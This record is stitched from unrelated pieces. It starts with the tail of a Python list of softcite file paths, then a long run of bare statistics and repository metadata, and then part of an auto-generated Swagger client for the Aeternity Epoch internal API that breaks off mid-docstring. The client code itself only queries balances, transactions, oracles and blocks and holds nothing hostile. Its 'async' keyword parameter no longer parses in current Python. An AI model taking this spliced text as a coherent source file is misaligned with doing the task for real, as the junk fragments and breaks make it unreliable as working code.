OvhPath('softcite','9f', 'ea', '8e', '3a', '9fea8e3a-344c-4552-874c-6852074bcdd1', '9fea8e3a-344c-4552-874c-6852074bcdd1.software.json')
),
(
'./tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.software.json',
OvhPath('softcite', 'dc', 'd4', '1f', '3e', 'dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38', 'dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.software.json')
),
]
| 47.45
| 145
| 0.728135
| 225
| 1,898
| 6.035556
| 0.2
| 0.114875
| 0.220913
| 0.147275
| 0.820324
| 0.820324
| 0.820324
| 0.807069
| 0.741532
| 0.693667
| 0
| 0.214328
| 0.110116
| 1,898
| 40
| 146
| 47.45
| 0.589698
| 0
| 0
| 0.333333
| 0
| 0
| 0.679305
| 0.647709
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.138889
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4fa66e13bda6f759767d7ec5ea225dc529e40f21
| 126,407
|
py
|
Python
|
py/tests/swagger_client/api/internal_api.py
|
AndyHongSir/epoch
|
3ac26ee08c12d5d923c88eb5db5479f3b9d9b294
|
[
"ISC"
] | null | null | null |
py/tests/swagger_client/api/internal_api.py
|
AndyHongSir/epoch
|
3ac26ee08c12d5d923c88eb5db5479f3b9d9b294
|
[
"ISC"
] | null | null | null |
py/tests/swagger_client/api/internal_api.py
|
AndyHongSir/epoch
|
3ac26ee08c12d5d923c88eb5db5479f3b9d9b294
|
[
"ISC"
] | null | null | null |
# coding: utf-8
"""
Aeternity Epoch
This is the [Aeternity](https://www.aeternity.com/) Epoch API. # noqa: E501
OpenAPI spec version: 0.7.0
Contact: apiteam@aeternity.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class InternalApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_account_balance(self, account_pubkey, **kwargs): # noqa: E501
"""get_account_balance # noqa: E501
Get accounts's balance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_balance(account_pubkey, async=True)
>>> result = thread.get()
:param async bool
:param str account_pubkey: Account pubkey to show balance for (required)
:param int height: Height of the block to show balance at
:param str hash: Hash of the block to show balance at
:return: Balance
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_balance_with_http_info(account_pubkey, **kwargs) # noqa: E501
else:
(data) = self.get_account_balance_with_http_info(account_pubkey, **kwargs) # noqa: E501
return data
def get_account_balance_with_http_info(self, account_pubkey, **kwargs): # noqa: E501
"""get_account_balance # noqa: E501
Get accounts's balance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_balance_with_http_info(account_pubkey, async=True)
>>> result = thread.get()
:param async bool
:param str account_pubkey: Account pubkey to show balance for (required)
:param int height: Height of the block to show balance at
:param str hash: Hash of the block to show balance at
:return: Balance
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_pubkey', 'height', 'hash'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_balance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_pubkey' is set
if ('account_pubkey' not in params or
params['account_pubkey'] is None):
raise ValueError("Missing the required parameter `account_pubkey` when calling `get_account_balance`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_pubkey' in params:
path_params['account_pubkey'] = params['account_pubkey'] # noqa: E501
query_params = []
if 'height' in params:
query_params.append(('height', params['height'])) # noqa: E501
if 'hash' in params:
query_params.append(('hash', params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/account/balance/{account_pubkey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Balance', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_transactions(self, account_pubkey, **kwargs): # noqa: E501
"""get_account_transactions # noqa: E501
Get accounts's transactions included in blocks in the longest chain # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_transactions(account_pubkey, async=True)
>>> result = thread.get()
:param async bool
:param str account_pubkey: Account pubkey to show transactions for (required)
:param int limit: Maximum transactions count to show
:param int offset: Offset to start transaction list from
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:param str tx_encoding: Transactions encoding
:return: TxObjects
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_transactions_with_http_info(account_pubkey, **kwargs) # noqa: E501
else:
(data) = self.get_account_transactions_with_http_info(account_pubkey, **kwargs) # noqa: E501
return data
def get_account_transactions_with_http_info(self, account_pubkey, **kwargs): # noqa: E501
"""get_account_transactions # noqa: E501
Get accounts's transactions included in blocks in the longest chain # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_transactions_with_http_info(account_pubkey, async=True)
>>> result = thread.get()
:param async bool
:param str account_pubkey: Account pubkey to show transactions for (required)
:param int limit: Maximum transactions count to show
:param int offset: Offset to start transaction list from
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:param str tx_encoding: Transactions encoding
:return: TxObjects
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_pubkey', 'limit', 'offset', 'tx_types', 'exclude_tx_types', 'tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_transactions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_pubkey' is set
if ('account_pubkey' not in params or
params['account_pubkey'] is None):
raise ValueError("Missing the required parameter `account_pubkey` when calling `get_account_transactions`") # noqa: E501
if 'limit' in params and params['limit'] > 100: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_account_transactions`, must be a value less than or equal to `100`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_account_transactions`, must be a value greater than or equal to `1`") # noqa: E501
if 'offset' in params and params['offset'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `offset` when calling `get_account_transactions`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_pubkey' in params:
path_params['account_pubkey'] = params['account_pubkey'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/account/txs/{account_pubkey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TxObjects', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_active_registered_oracles(self, **kwargs): # noqa: E501
"""get_active_registered_oracles # noqa: E501
Get active registered oracles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_active_registered_oracles(async=True)
>>> result = thread.get()
:param async bool
:param str _from: Last oracle in previous page
:param int max: Max number of active oracles received
:return: RegisteredOracles
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_active_registered_oracles_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_active_registered_oracles_with_http_info(**kwargs) # noqa: E501
return data
def get_active_registered_oracles_with_http_info(self, **kwargs): # noqa: E501
"""get_active_registered_oracles # noqa: E501
Get active registered oracles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_active_registered_oracles_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str _from: Last oracle in previous page
:param int max: Max number of active oracles received
:return: RegisteredOracles
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_from', 'max'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_active_registered_oracles" % key
)
params[key] = val
del params['kwargs']
if 'max' in params and params['max'] > 1000: # noqa: E501
raise ValueError("Invalid value for parameter `max` when calling `get_active_registered_oracles`, must be a value less than or equal to `1000`") # noqa: E501
if 'max' in params and params['max'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `max` when calling `get_active_registered_oracles`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if '_from' in params:
query_params.append(('from', params['_from'])) # noqa: E501
if 'max' in params:
query_params.append(('max', params['max'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/oracles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RegisteredOracles', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_by_hash_internal(self, hash, **kwargs): # noqa: E501
"""get_block_by_hash_internal # noqa: E501
Get a block by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_by_hash_internal(hash, async=True)
>>> result = thread.get()
:param async bool
:param str hash: Hash of the block to fetch (required)
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_by_hash_internal_with_http_info(hash, **kwargs) # noqa: E501
else:
(data) = self.get_block_by_hash_internal_with_http_info(hash, **kwargs) # noqa: E501
return data
def get_block_by_hash_internal_with_http_info(self, hash, **kwargs): # noqa: E501
"""get_block_by_hash_internal # noqa: E501
Get a block by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_by_hash_internal_with_http_info(hash, async=True)
>>> result = thread.get()
:param async bool
:param str hash: Hash of the block to fetch (required)
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['hash', 'tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_by_hash_internal" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'hash' is set
if ('hash' not in params or
params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `get_block_by_hash_internal`") # noqa: E501
collection_formats = {}
path_params = {}
if 'hash' in params:
path_params['hash'] = params['hash'] # noqa: E501
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/hash/{hash}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GenericBlock', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_by_height_internal(self, height, **kwargs): # noqa: E501
"""get_block_by_height_internal # noqa: E501
Get a block by height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_by_height_internal(height, async=True)
>>> result = thread.get()
:param async bool
:param int height: Height of the block to fetch (required)
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_by_height_internal_with_http_info(height, **kwargs) # noqa: E501
else:
(data) = self.get_block_by_height_internal_with_http_info(height, **kwargs) # noqa: E501
return data
def get_block_by_height_internal_with_http_info(self, height, **kwargs): # noqa: E501
"""get_block_by_height_internal # noqa: E501
Get a block by height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_by_height_internal_with_http_info(height, async=True)
>>> result = thread.get()
:param async bool
:param int height: Height of the block to fetch (required)
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['height', 'tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_by_height_internal" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'height' is set
if ('height' not in params or
params['height'] is None):
raise ValueError("Missing the required parameter `height` when calling `get_block_by_height_internal`") # noqa: E501
collection_formats = {}
path_params = {}
if 'height' in params:
path_params['height'] = params['height'] # noqa: E501
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/height/{height}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GenericBlock', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_genesis(self, **kwargs): # noqa: E501
"""get_block_genesis # noqa: E501
Get the genesis block # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_genesis(async=True)
>>> result = thread.get()
:param async bool
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_genesis_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_block_genesis_with_http_info(**kwargs) # noqa: E501
return data
def get_block_genesis_with_http_info(self, **kwargs): # noqa: E501
"""get_block_genesis # noqa: E501
Get the genesis block # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_genesis_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_genesis" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/genesis', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GenericBlock', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_latest(self, **kwargs): # noqa: E501
"""get_block_latest # noqa: E501
Get the top block # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_latest(async=True)
>>> result = thread.get()
:param async bool
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_latest_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_block_latest_with_http_info(**kwargs) # noqa: E501
return data
def get_block_latest_with_http_info(self, **kwargs): # noqa: E501
"""get_block_latest # noqa: E501
Get the top block # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_latest_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_latest" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/latest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GenericBlock', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_number(self, **kwargs): # noqa: E501
"""get_block_number # noqa: E501
Get the current block's height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_number(async=True)
>>> result = thread.get()
:param async bool
:return: BlockHeight
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_number_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_block_number_with_http_info(**kwargs) # noqa: E501
return data
def get_block_number_with_http_info(self, **kwargs): # noqa: E501
"""get_block_number # noqa: E501
Get the current block's height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_number_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: BlockHeight
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_number" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/number', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BlockHeight', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_pending(self, **kwargs): # noqa: E501
"""get_block_pending # noqa: E501
Get the block being mined # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_pending(async=True)
>>> result = thread.get()
:param async bool
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_pending_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_block_pending_with_http_info(**kwargs) # noqa: E501
return data
def get_block_pending_with_http_info(self, **kwargs): # noqa: E501
"""get_block_pending # noqa: E501
Get the block being mined # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_pending_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str tx_encoding: Transactions encoding
:return: GenericBlock
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_pending" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/pending', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GenericBlock', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_txs_count_by_hash(self, hash, **kwargs): # noqa: E501
"""get_block_txs_count_by_hash # noqa: E501
Get a block transactions count by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_txs_count_by_hash(hash, async=True)
>>> result = thread.get()
:param async bool
:param str hash: Hash of the block to fetch (required)
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_txs_count_by_hash_with_http_info(hash, **kwargs) # noqa: E501
else:
(data) = self.get_block_txs_count_by_hash_with_http_info(hash, **kwargs) # noqa: E501
return data
def get_block_txs_count_by_hash_with_http_info(self, hash, **kwargs): # noqa: E501
"""get_block_txs_count_by_hash # noqa: E501
Get a block transactions count by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_txs_count_by_hash_with_http_info(hash, async=True)
>>> result = thread.get()
:param async bool
:param str hash: Hash of the block to fetch (required)
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['hash', 'tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_txs_count_by_hash" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'hash' is set
if ('hash' not in params or
params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `get_block_txs_count_by_hash`") # noqa: E501
collection_formats = {}
path_params = {}
if 'hash' in params:
path_params['hash'] = params['hash'] # noqa: E501
query_params = []
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/count/hash/{hash}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_txs_count_by_height(self, height, **kwargs): # noqa: E501
"""get_block_txs_count_by_height # noqa: E501
Get a block transactions count by height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_txs_count_by_height(height, async=True)
>>> result = thread.get()
:param async bool
:param int height: Height of the block to fetch (required)
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_txs_count_by_height_with_http_info(height, **kwargs) # noqa: E501
else:
(data) = self.get_block_txs_count_by_height_with_http_info(height, **kwargs) # noqa: E501
return data
def get_block_txs_count_by_height_with_http_info(self, height, **kwargs): # noqa: E501
"""get_block_txs_count_by_height # noqa: E501
Get a block transactions count by height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_txs_count_by_height_with_http_info(height, async=True)
>>> result = thread.get()
:param async bool
:param int height: Height of the block to fetch (required)
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['height', 'tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_txs_count_by_height" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'height' is set
if ('height' not in params or
params['height'] is None):
raise ValueError("Missing the required parameter `height` when calling `get_block_txs_count_by_height`") # noqa: E501
collection_formats = {}
path_params = {}
if 'height' in params:
path_params['height'] = params['height'] # noqa: E501
query_params = []
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/count/height/{height}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_genesis_block_txs_count(self, **kwargs): # noqa: E501
"""get_genesis_block_txs_count # noqa: E501
Get the genesis block transactions count # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
